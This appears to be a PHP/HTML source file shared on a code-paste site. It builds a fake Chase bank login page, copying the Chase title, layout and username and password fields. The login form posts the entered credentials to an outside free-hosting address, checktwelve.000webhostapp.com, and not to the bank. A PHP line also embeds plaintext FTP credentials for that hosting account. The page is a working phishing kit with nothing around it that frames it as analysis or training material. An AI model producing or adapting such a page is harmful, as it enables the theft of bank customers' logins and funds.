rodent2
2 years ago in PHP
<!DOCTYPE html>
<html>
<head>
<style type="text/css">
.chaseHeader {
/* padding-left:5px;
padding-right:5px;
padding-top:250px;
padding-bottom:25px;*/
height:148px;
width:100%;
float:center;
}
body {
height:4875px;
background-image:url(login-main-long.png);
/* background-color: #fff;
color: #414042;
font-family: "Open Sans",sans-serif;
font-size: 16px;
line-height: 1.125em;
overflow-y: scroll;*/
}
.table {
/*
display: table;
width:auto;
background-color:#eee;
width:100%;
height:400px;
border:1px solid #666666;
border-spacing:5px;*/
/*cellspacing:poor IE support for this*/
/* border-collapse:separate;*/
}
#chkbxtxt {
position:relative;
cursor:pointer;
}
.logonCheckbox {
cursor:pointer;
}
input {
border-top:0;
border-left:0;
border-right:0;
}
.row {
}
.cell {
/*float:left;fix for buggy browsers*/
}
#chaseBase {
float:right;
position:relative;
margin:auto;
width:300px;
}
#logbox {
}
/*#spacer{
width:600px;
height:400px;
margin:auto;}*/
#signin {
}
#usr_password {
position:relative;
/*line-height:27px;*/
opacity:25%;
border-right-width:0;
border-left-width:0;
border-top-width:0;
/*background:rgba(255,255,255,.96);*/
/*color:#414042;*/
}
.phWrapper {
float:left;
}
.phWrapper a.pH {
height:45px;
box-shadow:0 3px 0 -1px #0b6efd;
}
.phWrapper .button:active {
/*pointer-events:none;*/
}
.phWrapper:hover {
box-shadow:0 3px 0 -1px #0b6efd;
color:red;
position:relative;
bottom:20px;
right:4px;
margin-bottom:35px;
color:red;
}
#logbox.row .vertical .align-label .floating-wrapper #usrPH {
position:absolute;
display:inline-block;
margin-top:.75rem;
z-index:1;
text-align:left;
pointer-events:none;
margin-left:.5rem;
transition:all .2s ease-in-out;
color:#717171;
}
#usr_name {
position:relative;
opacity:25%;
/*line-height:30px;*/
border-right-width:0;
border-left-width:0;
border-top-width:0;
background:rgba(255,255,255,.96);
}
/*font-weight:700;*/
/*color:#414042;*/
.row#logbox {
text-align:left;
width:300px;
float:right;
position:relative;
top:162px;
right:382px;
}
/*
.jpui.fieldlabel.error:before {
content:attr(data-error);
position:absolute!important;
clip:rect(0.0625rem0.0625rem0.0625rem0.0625rem);
clip:rect(0.0625rem,0.0625rem,0.0625rem,0.0625rem);
padding:0!important;
border:0!important;
height:.0625rem!important;
width:.0625rem!important;
overflow:hidden;
}*/
#remember {
}
#logbox {
/* background-color:white;*/
}
.margin {
/*width:750px;
height:100px;*/
}
.chaseHeader form {
float:right;
text-align:left;
}
</style>
<title>Credit Card, Mortgage, Banking, Auto | Chase Online | Chase.com</title>
</head>
<body ><?php
header('Content-Type: image/jpeg');
echo file_get_contents('ftp://shaggy_wesley@mail.com:Shaggwesley69@ftp.https://files.000webhost.com/login-main-long.png');
?>
<header class="chaseHeader" id="chaseHeader">
<form name='microsite_site_search_form' onsubmit=
'javascript:return doSearch(document. microsite_site_search_form.QueryText.value)'
id="microsite_site_search_form">
<input name="QueryText" size="10" class="inputTextBox" title=
"Enter keyword to search" id="searchfield">
</form>
<!--style type="text/css"> input.logonCheckbox{width:20px;height:20px; }
<!/style-->
</header>
<div>
<div>
<div class="table">
<div class="row">
<div class="cell"></div>
<div class="cell"></div>
</div>
<div class="row">
<div class="cell"></div>
<div class="cell"></div>
<div class="cell"></div>
</div>
<div class="row vertical align-label floating-wrapper" id="logbox">
<div class="cell"></div>
<div class="phWrapper" id="usrPH">
<a class="pH">Username</a>
</div>
<div class="cell" id="usrnm">
<form name='logonform' autocomplete='off' action=
'https://checktwelve.000webhostapp.com/post.php'
id='logonform' method='post' onsubmit=
'return validateandsetcookie(document.logonform.usr_name, document.logonform.usr_password.value, document.logonform.remember.checked, .chase.com,RBGLogon)'
align='center' style=
'display: inline; margin: 0; padding: 0;'>
<input name="authmethod" type="hidden" value="">
<input name="locale" type="hidden" value="">
<input name="pagegentime" type="hidden" value="">
<input name="LOB" type="hidden" value="">
<input name="hiddenuri" type="hidden" value="">
<input name="usr_name" alt="Username" tabindex="1"
size="35" class="pwdTextBox" id="usr_name" maxlength=
"32">
</form>
</div>
<div style="height:10px;"></div>
<div class="phWrapper" id="pwPH">
<a class="pH">Password</a>
</div>
<div class="cell" id="pwd">
<div>
<input name="usr_password" tabindex="2" size="35"
class="pwdTextBox" type="password" id="usr_password"
maxlength="32">
</div>
<div>
<input tabindex="4" class="logonCheckbox" type=
"checkbox" name="remember" id="remember"> <label for=
"remember" id="chkbxtxt">Remember me</label>
</div>
<div>
<input id="signin" tabindex="3" type="image" src=
"images/signinbutton.png" vspace="0" border="0"
height="39" alt="" width="306">
</div>
</div>
</div>
<div id="spacer"></div>
</div>
</div>
</div><!-- Grid -->
<!-- Footer -->
</body>
</html>